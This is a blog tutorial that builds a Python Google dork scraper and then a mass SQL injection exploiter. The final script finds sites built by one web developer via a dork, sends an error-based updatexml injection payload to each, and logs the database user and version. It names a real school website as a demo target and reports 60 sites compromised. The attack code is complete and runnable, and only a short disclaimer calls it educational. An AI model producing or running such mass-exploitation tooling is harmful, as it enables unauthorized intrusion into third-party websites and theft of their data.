[Python] Making Your Own Google Scraper & Mass Exploiter - Mukarram Khalid
In this step-by-step tutorial, I’ll show you how to make your own Google scraper (dork scanner) and mass vulnerability scanner / exploiter in Python. Why Python? A few reasons:
Simplicity
Efficiency
Extensibility
Cross-platform portability
A great community
Requirements
For this tutorial, I’ll be using Python 3.4.3, some built-in libraries (sys (https://docs.python.org/3.4/library/sys.html), multiprocessing
(https://docs.python.org/3.4/library/multiprocessing.html), functools (https://docs.python.org/3/library/functools.html), re
(https://docs.python.org/3/library/re.html)), and the following modules.
Requests (https://pypi.python.org/pypi/requests)
Requests is an Apache2 Licensed HTTP library, written in Python, for human beings.
Beautifulsoup4 (https://pypi.python.org/pypi/beautifulsoup4)
Beautiful Soup sits atop an HTML or XML parser, providing Pythonic idioms for iterating, searching, and modifying the
parse tree.
To install these modules, I’ll use pip (https://docs.python.org/3/installing/). As per the documentation, pip is the preferred installer program and, starting
with Python 3.4, it is included by default with the Python binary installers. To use pip, open your terminal and simply type:
Python
python -m pip install requests beautifulsoup4
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/pip.png]
Note:
I’ll try to keep this as simple (and readable) as possible. Read the comments in the code. With each new code block, I’ll
remove the previous comments to make room for new ones, so make sure you don’t miss any.
Google handles every search through the same endpoint, with the query passed as URL parameters:
Python
http://www.google.com/search
So, if I want to search for the string ‘makman’, the URLs for successive result pages would be:
Python
Page 0 : http://www.google.com/search?q=makman&start=0
Page 1 : http://www.google.com/search?q=makman&start=10
Page 2 : http://www.google.com/search?q=makman&start=20
Page 3 : http://www.google.com/search?q=makman&start=30
...
Let’s do a quick test and see if we can grab the first page.
Python
import requests

#url
url = 'http://www.google.com/search'

#Parameters in payload
payload = { 'q' : 'makman', 'start' : '0' }

#Setting User-Agent
my_headers = { 'User-agent' : 'Mozilla/11.0' }

#Getting the response in an Object r
r = requests.get( url, params = payload, headers = my_headers )

#Print the response encoded as utf-8
print( r.text.encode('utf-8') )

#End
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/requests_check.png]
Now, we’ll use beautifulsoup4 to pull the required data from the source. The URLs we need are inside <h3> tags with class 'r'.
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/google_h3.png]
There will be 10 <h3 class="r"> tags on each page, and the URL we need is inside each of them as <a href="...">. So, we’ll use beautifulsoup4 to grab the
contents of all these h3 tags and then do some regex matching to extract the final URLs.
Python
import requests, re
from bs4 import BeautifulSoup


#url
url = 'http://www.google.com/search'

#Parameters in payload
payload = { 'q' : 'makman', 'start' : '0' }

#Setting User-Agent
my_headers = { 'User-agent' : 'Mozilla/11.0' }

#Getting the response in an Object r
r = requests.get( url, params = payload, headers = my_headers )

#Create a Beautiful Soup Object of the response r parsed as html
soup = BeautifulSoup( r.text, 'html.parser' )

#Getting all h3 tags with class 'r'
h3tags = soup.find_all( 'h3', class_='r' )

#Finding URL inside each h3 tag using regex.
#If found : Print, else : Ignore the exception
for h3 in h3tags:
    try:
        print( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
    except:
        continue


#End
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/first_page.png]
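To see what that regex is actually doing, here is a quick standalone check. The sample href below is only illustrative of the ‘/url?q=...&sa=...’ format Google wraps around each result; the real markup may differ.
Python
import re

#A Google result link looks roughly like '/url?q=<real url>&sa=U&ved=...'
sample_href = '/url?q=http://makman.tk/&sa=U&ved=0CBQQFjAA'

#Non-greedy capture of everything between 'url?q=' and '&sa'
match = re.search( r'url\?q=(.+?)\&sa', sample_href )
if match:
    print( match.group(1) )   #http://makman.tk/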
Now we just have to do this whole procedure generically. The user will provide the search string and the number of pages to scan. I’ll wrap this
whole process in a function and call it whenever required. To create the command-line interface, I’ll use an awesome module called docopt
(https://pypi.python.org/pypi/docopt), which is not part of Python’s standard library, but you’ll love it. I’ll use pip (again) to install docopt.
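The install is the same one-liner as before:
Python
python -m pip install docopt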
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/docopt.png]
After adding the command-line interface, user interaction, a little dynamic functionality, and some timing code to measure the execution time of the
script, this is what it looks like.
Python
1 """MakMan Google Scrapper & Mass Exploiter
2
3 Usage:
4 scrap.py <search> <pages>
5 scrap.py (-h | --help)
6
7 Arguments:
8 <search> String to be Searched
9 <pages> Number of pages
10
11 Options:
12 -h, --help Show this screen.
13
14 """
15
16 import requests, re
17 from docopt import docopt
18 from bs4 import BeautifulSoup
19 from time import time as timer
20
21
22 def get_urls(search_string, start):
23 #Empty temp List to store the Urls
24 temp = []
25 url = 'http://www.google.com/search'
26 payload = { 'q' : search_string, 'start' : start }
27 my_headers = { 'User-agent' : 'Mozilla/11.0' }
28 r = requests.get( url, params = payload, headers = my_headers )
29 soup = BeautifulSoup( r.text, 'html.parser' )
30 h3tags = soup.find_all( 'h3', class_='r' )
31 for h3 in h3tags:
32 try:
33 temp.append( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
34 except:
35 continue
36 return temp
37
38 def main():
39 start = timer()
40 #Empty List to store the Urls
41 result = []
42 arguments = docopt( __doc__, version='MakMan Google Scrapper & Mass Exploiter' )
43 search = arguments['<search>']
44 pages = arguments['<pages>']
45 #Calling the function [pages] times.
46 for page in range( 0, int(pages) ):
47 #Getting the URLs in the list
48 result.extend( get_urls( search, str(page*10) ) )
49 #Removing Duplicate URLs
50 result = list( set( result ) )
51 print( *result, sep = '\n' )
52 print( '\nTotal URLs Scraped : %s ' % str( len( result ) ) )
53 print( 'Script Execution Time : %s ' % ( timer() - start, ) )
54
55 if __name__ == '__main__':
56 main()
57
58 #End
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/testrun1.png]
Sweet. Let’s run it for the string ‘microsoft’, scan the first 20 pages, and check the execution time.
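Assuming the script is saved as scrap.py (the filename used in its usage string), the command would be:
Python
python scrap.py microsoft 20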
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/testrun2.png]
So, it scraped 200 URLs in about 32 seconds. Currently, it’s running as a single process. Let’s add some multiprocessing and see if we can reduce the
execution time. After adding multiprocessing, this is what my script looks like.
Python
1 """MakMan Google Scrapper & Mass Exploiter
2
3 Usage:
4 makman_scrapy.py <search> <pages> <processes>
5 makman_scrapy.py (-h | --help)
6
7 Arguments:
8 <search> String to be Searched
9 <pages> Number of pages
10 <processes> Number of parallel processes
11
12 Options:
13 -h, --help Show this screen.
14
15 """
16
17 import requests, re, sys
18 from docopt import docopt
19 from bs4 import BeautifulSoup
20 from time import time as timer
21 from functools import partial
22 from multiprocessing import Pool
23
24
25 def get_urls(search_string, start):
26 temp = []
27 url = 'http://www.google.com/search'
28 payload = { 'q' : search_string, 'start' : start }
29 my_headers = { 'User-agent' : 'Mozilla/11.0' }
30 r = requests.get( url, params = payload, headers = my_headers )
31 soup = BeautifulSoup( r.text, 'html.parser' )
32 h3tags = soup.find_all( 'h3', class_='r' )
33 for h3 in h3tags:
34 try:
35 temp.append( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
36 except:
37 continue
38 return temp
39
40 def main():
41 start = timer()
42 result = []
43 arguments = docopt( __doc__, version='MakMan Google Scrapper & Mass Exploiter' )
44 search = arguments['<search>']
45 pages = arguments['<pages>']
46 processes = int( arguments['<processes>'] )
47 ####Changes for Multi-Processing####
48 make_request = partial( get_urls, search )
49 pagelist = [ str(x*10) for x in range( 0, int(pages) ) ]
50 with Pool(processes) as p:
51 tmp = p.map(make_request, pagelist)
52 for x in tmp:
53 result.extend(x)
54 ####Changes for Multi-Processing####
55 result = list( set( result ) )
56 print( *result, sep = '\n' )
57 print( '\nTotal URLs Scraped : %s ' % str( len( result ) ) )
58 print( 'Script Execution Time : %s ' % ( timer() - start, ) )
59
60 if __name__ == '__main__':
61 main()
62
63 #End
Now let’s run the same string ‘microsoft’ for 20 pages but this time with 8 parallel processes.
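With the multiprocessing version saved as makman_scrapy.py (the filename in its usage string), that is:
Python
python makman_scrapy.py microsoft 20 8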
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/testrun3.png]
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/testrun4.png]
Perfect. The execution time went down to about 6 seconds, roughly 5 times faster than the previous single-process run.
Warning:
It’s not a good idea to use more than 8 parallel processes. Google may block your IP or show the CAPTCHA
verification page instead of the search results, so I would recommend keeping it at 8 or fewer.
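If Google does start pushing back, one simple mitigation is to slow down and detect the block page before parsing it. The sketch below is not part of the original script; the ‘unusual traffic’ marker string and the 429 status check are assumptions about how Google signals a block.
Python
import time
import requests

def polite_get( url, params, headers, delay = 2.0 ):
    #Sleep before every request to stay under rate limits (delay value is an assumption)
    time.sleep( delay )
    r = requests.get( url, params = params, headers = headers )
    #Rough check for Google's block / CAPTCHA page -- marker string and status code are assumptions
    if r.status_code == 429 or 'unusual traffic' in r.text:
        raise RuntimeError( 'Google appears to be rate-limiting this IP; back off and retry later' )
    return r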
So, our Google URL scraper is up and running. Now I’ll show you how to make a mass vulnerability scanner & exploitation tool using this Google
scraper. We can save this file and use it as a separate module in other projects. I’ll save the following code as makman.py.
makman.py Python
#By MakMan - 26-08-2015

import requests, re, sys
from bs4 import BeautifulSoup
from functools import partial
from multiprocessing import Pool


def get_urls(search_string, start):
    temp = []
    url = 'http://www.google.com/search'
    payload = { 'q' : search_string, 'start' : start }
    my_headers = { 'User-agent' : 'Mozilla/11.0' }
    r = requests.get( url, params = payload, headers = my_headers )
    soup = BeautifulSoup( r.text, 'html.parser' )
    h3tags = soup.find_all( 'h3', class_='r' )
    for h3 in h3tags:
        try:
            temp.append( re.search('url\?q=(.+?)\&sa', h3.a['href']).group(1) )
        except:
            continue
    return temp

def dork_scanner(search, pages, processes):
    result = []
    processes = int( processes )
    make_request = partial( get_urls, search )
    pagelist = [ str(x*10) for x in range( 0, int(pages) ) ]
    with Pool(processes) as p:
        tmp = p.map(make_request, pagelist)
    for x in tmp:
        result.extend(x)
    result = list( set( result ) )
    return result

#End
I have renamed the main function to dork_scanner. Now I can import this file in any other Python script and call dork_scanner to get URLs.
dork_scanner takes 3 parameters: the search string, the number of pages to scan, and the number of parallel processes, and it returns a list of URLs. Just make sure
makman.py is in the same directory as the other file. Let’s try it out.
main.py Python
from makman import *


if __name__ == '__main__':
    #Calling dork_scanner from makman.py
    #String : hello, pages : 2, processes : 2
    result = dork_scanner( 'hello', '2', '2' )
    print ( *result, sep = '\n' )


#End
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/main_test.png]
I’ll demonstrate mass scanning / exploitation using an SQL injection vulnerability that affects some websites developed by iNET Business Hub (web
application developers). Here’s a demo of the SQLi vulnerability in their photogallery module.
MySQL
http://mkmschool.edu.in/photogallery.php?extentions=1&rpp=1 procedure analyse( updatexml(null,concat+(0x3a,version()),null),1)
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/xpath1.png]
Even though this vulnerability is very old, there are still hundreds of websites vulnerable to this bug. The injection abuses MySQL’s updatexml(): the resulting
‘XPATH syntax error’ message echoes back whatever we concat() into the call, which is exactly the string the exploitation script looks for. We can use the following Google dork to find the
vulnerable websites.
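Here it is (the same string that gets passed to dork_scanner in the final script below):
intext:Developed by : iNET inurl:photogallery.php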
I’ve made a separate function, inject(), to perform the injection; you can see it in the full script below. Make sure makman.py is in the same directory.
I’ll call my dork_scanner function in the main function and scan the first 15 pages with 4 parallel processes. For the exploitation part, I’ll use 8 parallel
processes, because we have to inject around 150 URLs and that would take a very long time with a single process. So, after adding the main function,
multiprocessing for the exploitation part, and some file logging to save the results, this is what my script looks like.
main.py Python
#Make sure makman.py is in the same directory
from makman import *
from urllib.parse import urlparse
from time import time as timer


def inject( u ):
    #Payload with Injection Query
    payload = { 'extentions' : '1', 'rpp' : '1 /*!00000procedure analyse( updatexml(null,concat (0x3a,user(),0x3a,version()),null),1)*/' }
    #Formatting our URL properly
    o = urlparse(u)
    url = o.scheme + '://' + o.netloc + o.path
    try:
        r = requests.get( url, params = payload )
        if 'XPATH syntax error' in r.text:
            return url + ':' + re.search( "XPATH syntax error: ':(.+?)'", r.text ).group(1)
        else:
            return url + ':' + 'Not Vulnerable'
    except:
        return url + ':' + 'Bad Response'


def main():
    start = timer()
    #Calling dork_scanner from makman.py for 15 pages and 4 parallel processes
    search_result = dork_scanner( 'intext:Developed by : iNET inurl:photogallery.php', '15', '4' )
    file_string = '######## By MakMan ########\n'
    final_result = []
    count = 0
    #Running 8 parallel processes for the exploitation
    with Pool(8) as p:
        final_result.extend( p.map( inject, search_result ) )
    for i in final_result:
        if not 'Not Vulnerable' in i and not 'Bad Response' in i:
            count += 1
            print ( '------------------------------------------------\n')
            print ( 'Url : http:' + i.split(':')[1] )
            print ( 'User : ' + i.split(':')[2] )
            print ( 'Version : ' + i.split(':')[3] )
            print ( '------------------------------------------------\n')
            file_string = file_string + 'http:' + i.split(':')[1] + '\n' + i.split(':')[2] + '\n' + i.split(':')[3] + '\n\n\n'
    #Writing vulnerable URLs in a file makman.txt
    with open( 'makman.txt', 'a', encoding = 'utf-8' ) as file:
        file.write( file_string )
    print( 'Total URLs Scanned : %s' % len( search_result ) )
    print( 'Vulnerable URLs Found : %s' % count )
    print( 'Script Execution Time : %s' % ( timer() - start, ) )


if __name__ == '__main__':
    main()


#End
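Since the dork, page count, and process count are hardcoded in main(), running the final script takes no arguments:
Python
python main.py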
[Screenshot: //mukarramkhalid.com/wp-content/uploads/2015/08/final3.png]
Scan Result:
So, technically speaking: in 64 seconds we scanned 15 pages of Google, grabbed 140 URLs, visited each of those 140 URLs and performed the SQL injection,
and finally saved the results for 60 vulnerable URLs. So f***in’ cool!
You can see the result file generated at the end of the script here (http://makman.tk/makman.txt).
GitHub Repository:
Google-Scraper (https://github.com/mukarramkhalid/google-scraper)
Final Notes:
This script is not perfect; there are still plenty of features we could add. If you have any suggestions, feel free to contact me (details are in the footer). And thanks
for reading.
Disclaimer:
I take no responsibility for any loss or damage caused by this tutorial. This article has been shared for educational purposes only, and automated
crawling is against Google’s terms of service.